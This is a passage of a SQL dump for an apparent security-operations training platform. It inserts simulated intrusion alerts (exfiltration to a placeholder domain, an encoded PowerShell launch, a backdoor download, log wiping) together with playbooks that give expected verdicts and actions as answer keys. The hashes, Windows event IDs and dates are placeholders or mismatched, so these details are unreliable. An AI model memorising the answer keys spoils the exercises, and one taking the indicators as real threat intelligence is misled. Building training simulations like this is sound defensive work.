File hash and size match known signatures for exfiltrated data.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.189Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:25:43Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"185.199.110.153\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\\\",\\\"file_name\\\":\\\"confidential_report_2023.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_id\\\":\\\"jdoe\\\",\\\"action\\\":\\\"File Upload\\\",\\\"url\\\":\\\"https://maliciousdomain.com/upload\\\",\\\"description\\\":\\\"Large data transfer detected from internal IP 10.0.5.23 to external IP 185.199.110.153 over HTTPS. File hash and size match known signatures for exfiltrated data.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.189Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:25:43Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"185.199.110.153\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\\\",\\\"file_name\\\":\\\"confidential_report_2023.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_id\\\":\\\"jdoe\\\",\\\"action\\\":\\\"File Upload\\\",\\\"url\\\":\\\"https://maliciousdomain.com/upload\\\",\\\"description\\\":\\\"Large data transfer detected from internal IP 10.0.5.23 to external IP 185.199.110.153 over HTTPS. 
File hash and size match known signatures for exfiltrated data.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.189Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:25:43Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"185.199.110.153\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\\\",\\\"file_name\\\":\\\"confidential_report_2023.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_id\\\":\\\"jdoe\\\",\\\"action\\\":\\\"File Upload\\\",\\\"url\\\":\\\"https://maliciousdomain.com/upload\\\",\\\"description\\\":\\\"Large data transfer detected from internal IP 10.0.5.23 to external IP 185.199.110.153 over HTTPS. File hash and size match known signatures for exfiltrated data.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.189Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:25:43Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"185.199.110.153\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\\\",\\\"file_name\\\":\\\"confidential_report_2023.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_id\\\":\\\"jdoe\\\",\\\"action\\\":\\\"File Upload\\\",\\\"url\\\":\\\"https://maliciousdomain.com/upload\\\",\\\"description\\\":\\\"Large data transfer detected from internal IP 10.0.5.23 to external IP 185.199.110.153 over HTTPS. 
File hash and size match known signatures for exfiltrated data.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(563, 'Covering Tracks and Cleanup', 'high', 'System Logs', 'APT29 engaged in advanced defense evasion techniques by cleaning up system logs, removing files, and altering timestamps to eradicate evidence of their intrusion. The activity was detected following unusual log deletions and file manipulations on the compromised host.', 'Defense Evasion', 'T1070.004 - File Deletion', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:22:05Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.100\",\"username\":\"j.doe\",\"deleted_files\":[\"C:\\\\Windows\\\\Temp\\\\malicious_log.bak\",\"C:\\\\Users\\\\j.doe\\\\AppData\\\\Local\\\\Temp\\\\APT29_trace.txt\"],\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"action\":\"File Deletion\",\"log_source\":\"Windows Security\",\"message\":\"User j.doe executed file deletion commands to remove traces of unauthorized access.\"}', '2026-01-07 22:39:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT29 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious file used by APT29.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, 
NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.190Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:05Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"j.doe\\\",\\\"deleted_files\\\":[\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\malicious_log.bak\\\",\\\"C:\\\\\\\\Users\\\\\\\\j.doe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\APT29_trace.txt\\\"],\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"File Deletion\\\",\\\"log_source\\\":\\\"Windows Security\\\",\\\"message\\\":\\\"User j.doe executed file deletion commands to remove traces of unauthorized access.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.190Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:05Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"j.doe\\\",\\\"deleted_files\\\":[\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\malicious_log.bak\\\",\\\"C:\\\\\\\\Users\\\\\\\\j.doe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\APT29_trace.txt\\\"],\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"File Deletion\\\",\\\"log_source\\\":\\\"Windows Security\\\",\\\"message\\\":\\\"User j.doe executed file deletion commands to remove traces of unauthorized access.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.190Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:05Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"j.doe\\\",\\\"deleted_files\\\":[\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\malicious_log.bak\\\",\\\"C:\\\\\\\\Users\\\\\\\\j.doe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\APT29_trace.txt\\\"],\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"File Deletion\\\",\\\"log_source\\\":\\\"Windows Security\\\",\\\"message\\\":\\\"User j.doe executed file deletion commands to remove traces of unauthorized access.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.190Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:05Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"j.doe\\\",\\\"deleted_files\\\":[\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\malicious_log.bak\\\",\\\"C:\\\\\\\\Users\\\\\\\\j.doe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\APT29_trace.txt\\\"],\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"File Deletion\\\",\\\"log_source\\\":\\\"Windows Security\\\",\\\"message\\\":\\\"User j.doe executed file deletion commands to remove traces of unauthorized access.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.190Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:05Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"j.doe\\\",\\\"deleted_files\\\":[\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\malicious_log.bak\\\",\\\"C:\\\\\\\\Users\\\\\\\\j.doe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\APT29_trace.txt\\\"],\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"File Deletion\\\",\\\"log_source\\\":\\\"Windows Security\\\",\\\"message\\\":\\\"User j.doe executed file deletion commands to remove traces of unauthorized access.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(564, 'Initial Access via Phishing', 'medium', 'Email Security Logs', 'Lazarus Group initiates the attack by deploying phishing emails to Sony employees, leading to network infiltration.', 'Phishing Attack', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:22:43Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"email_subject\":\"Urgent: Action Required for Sony Account Update\",\"email_from\":\"it-support@sonypictures.com\",\"email_to\":\"john.doe@sonypictures.com\",\"attachment\":\"update-instructions.pdf\",\"attachment_hash\":\"3d2c9c6e1f8b2c1ddf3f2c9e1b8c3d2c\",\"malicious_link\":\"http://malicious-update.com/login\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-01-07 22:40:38', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of Sony Pictures network.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"it-support@sonypictures.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Spoofed email address used in phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3d2c9c6e1f8b2c1ddf3f2c9e1b8c3d2c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known phishing PDF attachment.\"}},{\"id\":\"artifact_5\",\"type\":\"url\",\"value\":\"http://malicious-update.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Scan\",\"verdict\":\"malicious\",\"details\":\"URL used for 
credential harvesting.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\"]}', 'Beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.192Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:22:43Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"email_subject\\\":\\\"Urgent: Action Required for Sony Account Update\\\",\\\"email_from\\\":\\\"it-support@sonypictures.com\\\",\\\"email_to\\\":\\\"john.doe@sonypictures.com\\\",\\\"attachment\\\":\\\"update-instructions.pdf\\\",\\\"attachment_hash\\\":\\\"3d2c9c6e1f8b2c1ddf3f2c9e1b8c3d2c\\\",\\\"malicious_link\\\":\\\"http://malicious-update.com/login\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.192Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:22:43Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"email_subject\\\":\\\"Urgent: Action Required for Sony Account Update\\\",\\\"email_from\\\":\\\"it-support@sonypictures.com\\\",\\\"email_to\\\":\\\"john.doe@sonypictures.com\\\",\\\"attachment\\\":\\\"update-instructions.pdf\\\",\\\"attachment_hash\\\":\\\"3d2c9c6e1f8b2c1ddf3f2c9e1b8c3d2c\\\",\\\"malicious_link\\\":\\\"http://malicious-update.com/login\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; 
x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.192Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:22:43Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"email_subject\\\":\\\"Urgent: Action Required for Sony Account Update\\\",\\\"email_from\\\":\\\"it-support@sonypictures.com\\\",\\\"email_to\\\":\\\"john.doe@sonypictures.com\\\",\\\"attachment\\\":\\\"update-instructions.pdf\\\",\\\"attachment_hash\\\":\\\"3d2c9c6e1f8b2c1ddf3f2c9e1b8c3d2c\\\",\\\"malicious_link\\\":\\\"http://malicious-update.com/login\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.192Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:22:43Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"email_subject\\\":\\\"Urgent: Action Required for Sony Account Update\\\",\\\"email_from\\\":\\\"it-support@sonypictures.com\\\",\\\"email_to\\\":\\\"john.doe@sonypictures.com\\\",\\\"attachment\\\":\\\"update-instructions.pdf\\\",\\\"attachment_hash\\\":\\\"3d2c9c6e1f8b2c1ddf3f2c9e1b8c3d2c\\\",\\\"malicious_link\\\":\\\"http://malicious-update.com/login\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.192Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:22:43Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"email_subject\\\":\\\"Urgent: Action Required for Sony Account 
Update\\\",\\\"email_from\\\":\\\"it-support@sonypictures.com\\\",\\\"email_to\\\":\\\"john.doe@sonypictures.com\\\",\\\"attachment\\\":\\\"update-instructions.pdf\\\",\\\"attachment_hash\\\":\\\"3d2c9c6e1f8b2c1ddf3f2c9e1b8c3d2c\\\",\\\"malicious_link\\\":\\\"http://malicious-update.com/login\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(565, 'Execution of Destover Malware', 'high', 'Endpoint Detection and Response (EDR)', 'The attackers execute the \'Destover\' wiper malware, causing widespread system damage and data destruction.', 'Malware Deployment', 'T1485: Data Destruction', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_id\":\"EDR-2023-1024\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"malware_name\":\"Destover\",\"file_path\":\"C:\\\\Windows\\\\Temp\\\\destover_wiper.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"jdoe\",\"process_id\":5678,\"action\":\"Malware Execution\",\"description\":\"Detected execution of Destover malware on endpoint.\"}', '2026-01-07 22:40:38', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Associated with known APT attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal corporate endpoint.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Destover malware.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Employee account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(566, 'Establishing Persistence - Backdoor Installation', 'medium', 'Network Traffic Analysis', 'A backdoor associated with the Lazarus Group was detected on the network, indicating an attempt to establish persistence on the compromised system.', 'Backdoor Installation', 'T1059 - Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:07Z\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":8080,\"protocol\":\"HTTP\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"uri\":\"/backdoor/installer.php\",\"method\":\"GET\",\"http_version\":\"1.1\",\"filename\":\"backdoor_installer.exe\",\"file_hash\":\"f2d4e2f7c2a2b5e1d4c3b2a1d5e2f4c3\",\"username\":\"jdoe\",\"action\":\"Download\",\"status\":\"200 OK\"}', '2026-01-07 22:40:38', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known Lazarus Group infrastructure.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f2d4e2f7c2a2b5e1d4c3b2a1d5e2f4c3\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Lazarus Group backdoor installer.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"backdoor_installer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"File known to be used by Lazarus Group for 
persistence.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account involved in suspicious download activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(567, 'Lateral Movement Within Network', 'high', 'Internal Server Logs', 'During step 4 of the operation, the Lazarus Group has moved laterally within the network, identifying critical systems for further exploitation. This activity was detected through internal server logs showing unauthorized access attempts and suspicious file transfers.', 'Internal Network Reconnaissance', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:45:23Z\",\"event_id\":\"4720\",\"source_ip\":\"10.1.2.3\",\"destination_ip\":\"192.168.10.5\",\"attacker_ip\":\"203.0.113.45\",\"user\":\"network_admin\",\"action\":\"login_attempt\",\"result\":\"success\",\"file_transferred\":\"exploit_tool_v2.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"target_system\":\"192.168.10.5\",\"protocol\":\"SMB\",\"notes\":\"Possible use of stolen credentials to access sensitive systems.\"}', '2026-01-07 22:40:38', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.2.3\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network source IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Target system within network\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known to be associated with Lazarus Group\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"exploit_tool_v2.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Unfamiliar executable transferred 
internally\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malicious tools\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.195Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:23Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"10.1.2.3\\\",\\\"destination_ip\\\":\\\"192.168.10.5\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"network_admin\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"result\\\":\\\"success\\\",\\\"file_transferred\\\":\\\"exploit_tool_v2.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"target_system\\\":\\\"192.168.10.5\\\",\\\"protocol\\\":\\\"SMB\\\",\\\"notes\\\":\\\"Possible use of stolen credentials to access sensitive systems.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.195Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
